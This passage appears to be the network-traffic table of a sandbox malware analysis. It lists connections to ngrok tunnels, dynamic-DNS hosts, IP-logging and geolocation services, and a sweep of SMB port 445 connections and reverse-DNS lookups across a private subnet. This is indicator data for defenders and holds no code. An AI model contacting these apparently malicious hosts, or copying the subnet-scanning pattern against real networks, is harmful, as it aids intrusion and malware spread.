| US | 8.8.8.8:53 | 69.209.201.84.in-addr.arpa | udp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | motiwa.xyz | udp |
| US | 199.59.243.227:443 | telete.in | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 104.26.4.15:443 | db-ip.com | tcp |
| US | 8.8.8.8:53 | 15.4.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | api.db-ip.com | udp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 104.26.4.15:443 | api.db-ip.com | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| DE | 45.153.241.244:5506 | | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 8.8.8.8:53 | bobrat1111.ddns.net | udp |
| US | 8.8.8.8:53 | www.maxmind.com | udp |
| US | 104.17.27.25:80 | www.maxmind.com | tcp |
| US | 8.8.8.8:53 | videoconvert-download38.xyz | udp |
| US | 107.178.223.183:443 | videoconvert-download38.xyz | tcp |
| US | 8.8.8.8:53 | 25.27.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | sergeevih43.tumblr.com | udp |
| US | 104.21.65.24:443 | api.2ip.ua | tcp |
| US | 74.114.154.18:443 | sergeevih43.tumblr.com | tcp |
| US | 8.8.8.8:53 | 24.65.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| SG | 2.56.59.245:80 | | tcp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| GB | 163.70.147.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | 18.154.114.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.147.70.163.in-addr.arpa | udp |
| GB | 142.250.187.195:80 | c.pki.goog | tcp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | grene231.ddns.net | udp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.223.178.107.in-addr.arpa | udp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | email.yg9.me | udp |
| US | 8.8.8.8:53 | email.yg9.me | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| RU | 176.111.174.254:56328 | | tcp |
| US | 8.8.8.8:53 | 80.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.0.127.10.in-addr.arpa | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | 101.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | grene231.ddns.net | udp |
| US | 8.8.8.8:53 | 68.0.127.10.in-addr.arpa | udp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 78.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.0.127.10.in-addr.arpa | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | 16.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.43:445 | tcp | |
| US | 8.8.8.8:53 | 23.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.34:445 | tcp | |
| N/A | 10.127.255.1:445 | tcp | |
| N/A | 10.127.255.36:445 | tcp | |
| N/A | 10.127.255.57:445 | tcp | |
| N/A | 10.127.255.49:445 | tcp | |
| N/A | 10.127.255.55:445 | tcp | |
| N/A | 10.127.255.26:445 | tcp | |
| N/A | 10.127.255.35:445 | tcp | |
| N/A | 10.127.255.50:445 | tcp | |
| N/A | 10.127.255.25:445 | tcp | |
| US | 8.8.8.8:53 | 29.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.15:445 | tcp | |
| N/A | 10.127.255.52:445 | tcp | |
| N/A | 10.127.255.63:445 | tcp | |
| N/A | 10.127.255.58:445 | tcp | |
| N/A | 10.127.255.14:445 | tcp | |
| N/A | 10.127.255.31:445 | tcp | |
| N/A | 10.127.255.33:445 | tcp | |
| N/A | 10.127.255.20:445 | tcp | |
| N/A | 10.127.255.37:445 | tcp | |
| N/A | 10.127.255.54:445 | tcp | |
| N/A | 10.127.255.12:445 | tcp | |
| N/A | 10.127.255.18:445 | tcp | |
| N/A | 10.127.255.2:445 | tcp | |
| N/A | 10.127.255.5:445 | tcp | |
| N/A | 10.127.255.45:445 | tcp | |
| US | 107.178.223.183:443 | videoconvert-download38.xyz | tcp |
| N/A | 10.127.255.10:445 | tcp | |
| N/A | 10.127.255.13:445 | tcp | |
| N/A | 10.127.255.38:445 | tcp | |
| N/A | 10.127.255.48:445 | tcp | |
| N/A | 10.127.255.64:445 | tcp | |
| N/A | 10.127.255.0:445 | tcp | |
| N/A | 10.127.255.59:445 | tcp | |
| N/A | 10.127.255.8:445 | tcp | |
| N/A | 10.127.255.30:445 | tcp | |
| N/A | 10.127.255.23:445 | tcp | |
| N/A | 10.127.255.41:445 | tcp | |
| N/A | 10.127.255.29:445 | tcp | |
| N/A | 10.127.255.47:445 | tcp | |
| N/A | 10.127.255.19:445 | tcp | |
| N/A | 10.127.255.6:445 | tcp | |
| N/A | 10.127.255.53:445 | tcp | |
| N/A | 10.127.255.62:445 | tcp | |
| N/A | 10.127.255.7:445 | tcp | |
| N/A | 10.127.255.24:445 | tcp | |
| N/A | 10.127.255.21:445 | tcp | |
| N/A | 10.127.255.42:445 | tcp | |
| N/A | 10.127.255.28:445 | tcp | |
| N/A | 10.127.255.32:445 | tcp | |
| N/A | 10.127.255.44:445 | tcp | |
| N/A | 10.127.255.3:445 | tcp | |
| N/A | 10.127.255.61:445 | tcp | |
| N/A | 10.127.255.16:445 | tcp | |
| N/A | 10.127.255.39:445 | tcp | |
| N/A | 10.127.255.56:445 | tcp | |
| N/A | 10.127.255.71:445 | tcp | |
| N/A | 10.127.255.75:445 | tcp | |
| N/A | 10.127.255.93:445 | tcp | |
| N/A | 10.127.255.85:445 | tcp | |
| N/A | 10.127.255.17:445 | tcp | |
| N/A | 10.127.255.65:445 | tcp | |
| N/A | 10.127.255.66:445 | tcp | |
| N/A | 10.127.255.67:445 | tcp | |
| N/A | 10.127.255.91:445 | tcp | |
| N/A | 10.127.255.40:445 | tcp | |
| N/A | 10.127.255.96:445 | tcp | |
| US | 8.8.8.8:53 | 24.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.0.127.10.in-addr.arpa | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | 27.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.89:445 | tcp | |
| N/A | 10.127.255.4:445 | tcp | |
| N/A | 10.127.255.99:445 | tcp | |
| N/A | 10.127.255.121:445 | tcp | |
| N/A | 10.127.255.125:445 | tcp | |
| N/A | 10.127.255.82:445 | tcp | |
| N/A | 10.127.255.95:445 | tcp | |
| N/A | 10.127.255.124:445 | tcp | |
| N/A | 10.127.255.80:445 | tcp | |
| N/A | 10.127.255.81:445 | tcp | |
| N/A | 10.127.255.105:445 | tcp | |
| N/A | 10.127.255.11:445 | tcp | |
| N/A | 10.127.255.27:445 | tcp | |
| N/A | 10.127.255.22:445 | tcp | |
| N/A | 10.127.255.108:445 | tcp | |
| N/A | 10.127.255.119:445 | tcp | |
| N/A | 10.127.255.106:445 | tcp | |
| N/A | 10.127.255.107:445 | tcp | |
| N/A | 10.127.255.77:445 | tcp | |
| N/A | 10.127.255.116:445 | tcp | |
| N/A | 10.127.255.100:445 | tcp | |
| N/A | 10.127.255.115:445 | tcp | |
| N/A | 10.127.255.128:445 | tcp | |
| N/A | 10.127.255.110:445 | tcp | |
| N/A | 10.127.255.117:445 | tcp | |
| N/A | 10.127.255.122:445 | tcp | |
| N/A | 10.127.255.127:445 | tcp | |
| N/A | 10.127.255.130:445 | tcp | |
| US | 8.8.8.8:53 | 17.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.69:445 | tcp | |
| N/A | 10.127.255.84:445 | tcp | |
| N/A | 10.127.255.51:445 | tcp | |
| N/A | 10.127.255.76:445 | tcp | |
| N/A | 10.127.255.72:445 | tcp | |
| N/A | 10.127.255.79:445 | tcp | |
| N/A | 10.127.255.101:445 | tcp | |
| N/A | 10.127.255.68:445 | tcp | |
| N/A | 10.127.255.78:445 | tcp | |
| N/A | 10.127.255.109:445 | tcp | |
| N/A | 10.127.255.123:445 | tcp | |
| N/A | 10.127.255.104:445 | tcp | |
| N/A | 10.127.255.126:445 | tcp | |
| N/A | 10.127.255.87:445 | tcp | |
| N/A | 10.127.255.83:445 | tcp | |
| N/A | 10.127.255.92:445 | tcp | |
| N/A | 10.127.255.114:445 | tcp | |
| N/A | 10.127.255.86:445 | tcp | |
| N/A | 10.127.255.120:445 | tcp | |
| US | 8.8.8.8:53 | 21.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.131:445 | tcp | |
| N/A | 10.127.255.129:445 | tcp | |
| US | 8.8.8.8:53 | 43.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.102:445 | tcp | |
| N/A | 10.127.255.113:445 | tcp | |
| N/A | 10.127.255.70:445 | tcp | |
| N/A | 10.127.255.88:445 | tcp | |
| N/A | 10.127.255.97:445 | tcp | |
| N/A | 10.127.255.9:445 | tcp | |
| N/A | 10.127.255.94:445 | tcp | |
| N/A | 10.127.255.112:445 | tcp | |
| N/A | 10.127.255.60:445 | tcp | |
| N/A | 10.127.255.90:445 | tcp | |
| N/A | 10.127.255.98:445 | tcp | |
| N/A | 10.127.255.111:445 | tcp | |
| US | 8.8.8.8:53 | 39.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.74:445 | tcp | |
| N/A | 10.127.255.46:445 | tcp | |
| N/A | 10.127.255.103:445 | tcp | |
| N/A | 10.127.255.73:445 | tcp | |
| N/A | 10.127.255.118:445 | tcp | |
| US | 8.8.8.8:53 | 45.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.155:445 | tcp | |
| N/A | 10.127.255.217:445 | tcp | |
| N/A | 10.127.255.141:445 | tcp | |
| N/A | 10.127.255.206:445 | tcp | |
| N/A | 10.127.255.138:445 | tcp | |
| N/A | 10.127.255.149:445 | tcp | |
| N/A | 10.127.255.250:445 | tcp | |
| N/A | 10.127.255.227:445 | tcp | |
| N/A | 10.127.255.244:445 | tcp | |
| N/A | 10.127.255.226:445 | tcp | |
| N/A | 10.127.255.207:445 | tcp | |
| N/A | 10.127.255.215:445 | tcp | |
| N/A | 10.127.255.183:445 | tcp | |
| N/A | 10.127.255.193:445 | tcp | |
| N/A | 10.127.255.236:445 | tcp | |
| N/A | 10.127.255.208:445 | tcp | |
| N/A | 10.127.255.134:445 | tcp | |
| N/A | 10.127.255.225:445 | tcp | |
| N/A | 10.127.255.172:445 | tcp | |
| N/A | 10.127.255.202:445 | tcp | |
| US | 8.8.8.8:53 | 46.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 44.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.0.127.10.in-addr.arpa | udp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| N/A | 10.127.255.192:445 | tcp | |
| US | 8.8.8.8:53 | grene231.ddns.net | udp |
| N/A | 10.127.255.160:445 | tcp | |
| N/A | 10.127.255.150:445 | tcp | |
| US | 199.59.243.227:443 | telete.in | tcp |
| N/A | 10.127.255.165:445 | tcp | |
| N/A | 10.127.255.168:445 | tcp | |
| N/A | 10.127.255.171:445 | tcp | |
| N/A | 10.127.255.200:445 | tcp | |
| US | 8.8.8.8:53 | ibram.zapto.org | udp |
| N/A | 10.127.255.212:445 | tcp | |
| N/A | 10.127.255.184:445 | tcp | |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| N/A | 10.127.255.190:445 | tcp | |
| N/A | 10.127.255.213:445 | tcp | |
| N/A | 10.127.255.239:445 | tcp | |
| N/A | 10.127.255.178:445 | tcp | |
| N/A | 10.127.255.181:445 | tcp | |
| N/A | 10.127.255.180:445 | tcp | |
| N/A | 10.127.255.219:445 | tcp | |
| N/A | 10.127.255.173:445 | tcp | |
| N/A | 10.127.255.196:445 | tcp | |
| N/A | 10.127.255.197:445 | tcp | |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| N/A | 10.127.255.249:445 | tcp | |
| N/A | 10.127.255.254:445 | tcp | |
| N/A | 10.127.255.162:445 | tcp | |
| N/A | 10.127.255.191:445 | tcp | |
| N/A | 10.127.255.238:445 | tcp | |
| N/A | 10.127.255.164:445 | tcp | |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| N/A | 10.127.255.216:445 | tcp | |
| N/A | 10.127.255.218:445 | tcp | |
| N/A | 10.127.255.231:445 | tcp | |
| N/A | 10.127.255.179:445 | tcp | |
| N/A | 10.127.255.142:445 | tcp | |
| N/A | 10.127.255.194:445 | tcp | |
| N/A | 10.127.255.163:445 | tcp | |
| N/A | 10.127.255.230:445 | tcp | |
| N/A | 10.127.255.182:445 | tcp | |
| N/A | 10.127.255.187:445 | tcp | |
| N/A | 10.127.255.232:445 | tcp | |
| N/A | 10.127.255.157:445 | tcp | |
| N/A | 10.127.255.205:445 | tcp | |
| N/A | 10.127.255.158:445 | tcp | |
| N/A | 10.127.255.224:445 | tcp | |
| N/A | 10.127.255.145:445 | tcp | |
| N/A | 10.127.255.195:445 | tcp | |
| N/A | 10.127.255.140:445 | tcp | |
| N/A | 10.127.255.167:445 | tcp | |
| N/A | 10.127.255.229:445 | tcp | |
| N/A | 10.127.255.188:445 | tcp | |
| N/A | 10.127.255.136:445 | tcp | |
| N/A | 10.127.255.177:445 | tcp | |
| N/A | 10.127.255.148:445 | tcp | |
| N/A | 10.127.255.143:445 | tcp | |
| N/A | 10.127.255.153:445 | tcp | |
| N/A | 10.127.255.137:445 | tcp | |
| N/A | 10.127.255.246:445 | tcp | |
| N/A | 10.127.255.233:445 | tcp | |
| N/A | 10.127.255.210:445 | tcp | |
| N/A | 10.127.255.154:445 | tcp | |
| N/A | 10.127.255.135:445 | tcp | |
| N/A | 10.127.255.211:445 | tcp | |
| N/A | 10.127.255.241:445 | tcp | |
| N/A | 10.127.255.222:445 | tcp | |
| N/A | 10.127.255.139:445 | tcp | |
| N/A | 10.127.255.203:445 | tcp | |
| N/A | 10.127.255.186:445 | tcp | |
| N/A | 10.127.255.209:445 | tcp | |
| N/A | 10.127.255.204:445 | tcp | |
| GB | 92.123.128.182:443 | www.bing.com | tcp |
| N/A | 10.127.255.247:445 | tcp | |
| N/A | 10.127.255.221:445 | tcp | |
| N/A | 10.127.255.223:445 | tcp | |
| N/A | 10.127.255.201:445 | tcp | |
| N/A | 10.127.255.228:445 | tcp | |
| N/A | 10.127.255.151:445 | tcp | |
| N/A | 10.127.255.170:445 | tcp | |
| N/A | 10.127.255.176:445 | tcp | |
| N/A | 10.127.255.220:445 | tcp | |
| US | 8.8.8.8:53 | 35.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.240:445 | tcp | |
| N/A | 10.127.255.169:445 | tcp | |
| N/A | 10.127.255.185:445 | tcp | |
| N/A | 10.127.255.199:445 | tcp | |
| N/A | 10.127.255.237:445 | tcp | |
| N/A | 10.127.255.166:445 | tcp | |
| GB | 92.123.128.182:443 | www.bing.com | tcp |
| N/A | 10.127.255.234:445 | tcp | |
| N/A | 10.127.255.235:445 | tcp | |
| N/A | 10.127.255.214:445 | tcp | |
| N/A | 10.127.255.152:445 | tcp | |
| N/A | 10.127.255.161:445 | tcp | |
| N/A | 10.127.255.174:445 | tcp | |
| N/A | 10.127.255.133:445 | tcp | |
| N/A | 10.127.255.132:445 | tcp | |
| N/A | 10.127.255.198:445 | tcp | |
| N/A | 10.127.255.242:445 | tcp | |
| N/A | 10.127.255.146:445 | tcp | |
| N/A | 10.127.255.144:445 | tcp | |
| N/A | 10.127.255.159:445 | tcp | |
| N/A | 10.127.255.147:445 | tcp | |
| N/A | 10.127.255.175:445 | tcp | |
| N/A | 10.127.255.189:445 | tcp | |
| N/A | 10.127.255.156:445 | tcp | |
| N/A | 10.127.255.243:445 | tcp | |
| US | 8.8.8.8:53 | email.yg9.me | udp |
| US | 8.8.8.8:53 | email.yg9.me | udp |
| US | 8.8.8.8:53 | 30.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.253:445 | tcp | |
| N/A | 10.127.255.245:445 | tcp | |
| US | 8.8.8.8:53 | flestriche.xyz | udp |
| N/A | 10.127.255.251:445 | tcp | |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
| US | 8.8.8.8:53 | 62.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.248:445 | tcp | |
| US | 8.8.8.8:53 | 63.0.127.10.in-addr.arpa | udp |
| N/A | 10.127.255.252:445 | tcp | |
| US | 8.8.8.8:53 | 58.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | 59.0.127.10.in-addr.arpa | udp |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 102.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.0.127.10.in-addr.arpa | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | 111.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | uyg5wye.2ihsfa.com | udp |
| DE | 45.153.241.244:5506 | tcp | |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| FR | 134.119.181.15:3963 | tcp | |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | grene231.ddns.net | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 51.0.127.10.in-addr.arpa | udp |
| GB | 92.123.128.182:443 | www.bing.com | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 13.248.252.114:80 | uyg5wye.2ihsfa.com | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| US | 8.8.8.8:53 | 49.0.127.10.in-addr.arpa | udp |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 74.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.0.127.10.in-addr.arpa | udp |
| DE | 3.126.245.176:13337 | tcp | |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 8.8.8.8:53 | 95.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.0.127.10.in-addr.arpa | udp |
| US | 107.178.223.183:443 | videoconvert-download38.xyz | tcp |
| GB | 92.123.128.182:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | flestriche.xyz | udp |
| US | 8.8.8.8:53 | ibram.zapto.org | udp |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | 182.128.123.92.in-addr.arpa | udp |
| GB | 92.123.128.182:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | grene231.ddns.net | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| MX | 136.144.41.201:80 | tcp | |
| US | 8.8.8.8:53 | 46.2.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.252.248.13.in-addr.arpa | udp |
| DE | 3.124.142.205:443 | 8c881c2cfea9.ngrok.io | tcp |
| US | 3.142.167.4:10093 | 8.tcp.ngrok.io | tcp |
| US | 8.8.8.8:53 | email.yg9.me | udp |
| US | 8.8.8.8:53 | email.yg9.me | udp |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| US | 199.59.243.227:443 | telete.in | tcp |
| GB | 92.123.128.182:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | flestriche.xyz | udp |
| US | 8.8.8.8:53 | 136.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.0.127.10.in-addr.arpa | udp |
